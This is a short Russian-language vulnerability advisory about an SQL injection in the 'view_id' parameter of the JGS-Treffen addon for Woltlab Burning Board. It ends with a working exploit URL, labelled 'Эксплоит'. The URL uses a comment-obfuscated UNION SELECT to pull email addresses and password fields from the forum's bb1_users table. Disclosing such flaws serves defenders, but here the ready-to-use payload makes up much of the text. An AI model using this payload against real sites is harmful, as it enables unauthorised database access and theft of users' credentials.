Программа: Woltlab Burning Board Addon JGS-Treffen
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «view_id» сценарием jgs_treffen.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
jgs_treffen.php?action=ansicht&view_id='-1/* */UnIoN/**/All/**/SeLeCt/* */1,2,CoNcAt(email,0x3a,password),4,5,6,7,8,9, 10,11,12,13,14,15/**/from/**/bb1_users/*